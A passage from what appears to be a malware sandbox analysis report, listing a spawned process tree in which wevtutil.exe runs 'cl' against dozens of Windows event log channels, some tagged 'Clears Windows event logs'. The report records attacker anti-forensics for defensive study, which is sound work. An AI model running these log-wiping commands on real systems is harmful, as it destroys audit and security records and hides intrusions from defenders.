  wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
  2⤵
  PID:4524
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
  2⤵
  PID:4204
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
  2⤵
  PID:1192
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
  2⤵
  PID:804
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"
  2⤵
  PID:3960
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"
  2⤵
  PID:4600
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
  2⤵
  PID:528
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"
  2⤵
  PID:3416
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
  2⤵
  PID:2376
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
  2⤵
  PID:2764
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
  2⤵
  PID:3324
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Backup"
  2⤵
  PID:3708
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
  2⤵
  - Clears Windows event logs
  PID:3336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
  2⤵
  PID:2800
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
  2⤵
  PID:1008
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
  2⤵
  PID:4512
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
  2⤵
  PID:1084
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
  2⤵
  PID:2280
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
  2⤵
  PID:8
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
  2⤵
  PID:964
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
  2⤵
  PID:2768
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
  2⤵
  PID:2460
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
  2⤵
  PID:3124
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
  2⤵
  PID:428
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
  2⤵
  PID:2688
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
  2⤵
  PID:1036
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"
  2⤵
  PID:548
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
  2⤵
  PID:3700
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"
  2⤵
  - Clears Windows event logs
  PID:4060
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
  2⤵
  - Clears Windows event logs
  PID:4100
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
  2⤵
  PID:3192
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
  2⤵
  PID:3392
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
  2⤵
  PID:3732
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
  2⤵
  PID:4088
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
  2⤵
  PID:1832
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
  2⤵
  PID:4964
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
  2⤵
  PID:4628
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
  2⤵
  PID:1764
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
  2⤵
  PID:2028
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
  2⤵
  PID:3672
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
  2⤵
  - Clears Windows event logs
  PID:4448
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-COM/Call"
  2⤵
  PID:3996
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
  2⤵
  PID:728
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
  2⤵
  PID:1376
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
  2⤵
  PID:4932
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"
  2⤵
  PID:1156
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
  2⤵
  - Clears Windows event logs
  PID:4620
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
  2⤵
  PID:1104
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
  2⤵
  PID:4084
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
  2⤵
  PID:404
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
  2⤵
  PID:4244
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
  2⤵
  PID:2152
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
  2⤵
  PID:1600
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"
  2⤵
  PID:4416
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
  2⤵
  PID:2148
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
  2⤵
  PID:3680
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
  2⤵
  PID:4104
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
  2⤵
  PID:3396
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
  2⤵
  PID:2316
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
  2⤵
  PID:220
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
  2⤵
  PID:1328
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
  2⤵
  PID:2336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
  2⤵
  PID:4116
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
  2⤵
  PID:4064
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"
  2⤵
  PID:2856
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"
  2⤵
  PID:1392
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
  2⤵
  PID:1196
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
  2⤵
  PID:4968
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
  2⤵
  PID:2652
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
  2⤵
  PID:3540
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
  2⤵
  PID:1664
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
  2⤵
  PID:3476
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
  2⤵
  PID:688
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
  2⤵
  PID:3740
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
  2⤵
  PID:4272
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
  2⤵
  PID:1784
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
  2⤵
  PID:1528
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
  2⤵
  PID:2368
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
  2⤵
  PID:512
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
  2⤵
  - Clears Windows event logs
  PID:1436
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
  2⤵
  PID:5072
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
  2⤵
  PID:2560
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
  2⤵
  PID:5084
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
  2⤵
  PID:3240
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
  2⤵
  PID:4916
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
  2⤵
  PID:4560
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
  2⤵
  PID:4812
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
  2⤵
  PID:860
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
  2⤵
  PID:4312
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
  2⤵
  PID:3028
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
  2⤵
  PID:692
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
  2⤵
  PID:1532
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
  2⤵
  PID:2240
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
  2⤵
  PID:4752
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
  2⤵
  PID:440
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
  2⤵
  PID:4988
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
  2⤵
  PID:1936
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
  2⤵
  PID:2760
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
  2⤵
  PID:540
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
  2⤵
  PID:4492
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
  2⤵
  PID:1520
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
  2⤵
  PID:4980
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
  2⤵
  PID:3160
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
  2⤵
  PID:1916
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
  2⤵
  PID:4800
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
  2⤵
  PID:2204
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
  2⤵
  PID:1636
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
  2⤵
  PID:1580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
  2⤵
  PID:2844
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
  2⤵
  PID:4232
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
  2⤵
  PID:1484
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
  2⤵
  PID:2536
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
  2⤵
  PID:936
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
  2⤵
  PID:4336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
  2⤵
  PID:3956
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
  2⤵
  - Clears Windows event logs
  PID:2896
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
  2⤵
  PID:4076
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
  2⤵
  PID:4120
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
  2⤵
  PID:1572
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
  2⤵
  PID:4112
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
  2⤵
  PID:1640
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
  2⤵
  PID:1088
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
  2⤵
  PID:2708
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
  2⤵
  PID:3128
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
  2⤵
  PID:3444
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
  2⤵
  PID:2572
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"
  2⤵
  PID:5040
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
  2⤵
  PID:3504
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
  2⤵
  PID:3884
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"
  2⤵
  PID:960
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
  2⤵
  PID:3280
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
  2⤵
  PID:1304
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
  2⤵
  PID:4368
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
  2⤵
  PID:1944
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
  2⤵
  PID:2472
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
  2⤵
  PID:2976
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceUpdateAgent/Operational"
  2⤵
  PID:4612
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
  2⤵
  PID:5076
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
  2⤵
  PID:2644
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
  2⤵
  PID:4320
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
  2⤵
  PID:3360
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
  2⤵
  PID:4648
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
  2⤵
  PID:4152
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
  2⤵
  PID:1256
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
  2⤵
  PID:3168
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
  2⤵
  - Clears Windows event logs
  PID:4300
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
  2⤵
  PID:1576
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
  2⤵
  PID:4288
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
  2⤵
  PID:2580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
  2⤵
  PID:1140
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
  2⤵
  PID:4124
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
  2⤵
  PID:4380
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
  2⤵
  PID:1896
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
  2⤵
  PID:4868
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
  2⤵
  PID:3472
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
  2⤵
  PID:3812
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
  2⤵
  PID:4452
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
  2⤵
  PID:4292
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
  2⤵
  PID:4896
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
  2⤵
  PID:1108
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
  2⤵
  PID:2192
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
  2⤵
  PID:312
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
  2⤵
  PID:944
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
  2⤵
  PID:3368
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
  2⤵
  PID:3132
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
  2⤵
  PID:2488
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
  2⤵
  PID:3492
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
  2⤵
  PID:1180
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
  2⤵
  PID:5068
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
  2⤵
  PID:376
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
  2⤵
  PID:3736
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
  2⤵
  PID:2120
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
  2⤵
  PID:3832
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
  2⤵
  PID:1752
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
  2⤵
  PID:996
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
  2⤵
  - Clears Windows event logs
  PID:2600
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
  2⤵
  PID:1460
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"
  2⤵
  PID:2824
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"
  2⤵
  PID:4316
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"
  2⤵
  - Clears Windows event logs
  PID:4308
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"
  2⤵
  PID:3388
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"
  2⤵
  PID:5100
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"
  2⤵
  PID:4252
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"
  2⤵
  PID:4880
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
  2⤵
  PID:2736
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
  2⤵
  PID:3240
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
  2⤵
  PID:4916
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
  2⤵
  PID:4560
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
  2⤵
  PID:4812
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
  2⤵
  PID:860
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"
  2⤵
  PID:4312
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"
  2⤵
  PID:3028
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"
  2⤵
  PID:692
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"
  2⤵
  PID:696
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
  2⤵
  PID:708
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
  2⤵
  PID:4828
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
  2⤵
  PID:5032
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
  2⤵
  PID:3264
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"
  2⤵
  PID:3212
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
  2⤵
  PID:1144
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DucUpdateAgent/Operational"
  2⤵
  PID:3860
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"
  2⤵
  PID:3728
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"
  2⤵
  PID:1520
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"
  2⤵
  PID:4980
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"
  2⤵
  PID:3160
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"
  2⤵
  PID:1916
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Admin"
  2⤵
  PID:4800
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Operational"
  2⤵
  PID:2204
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"
  2⤵
  PID:1636
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
  2⤵
  PID:1580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
  2⤵
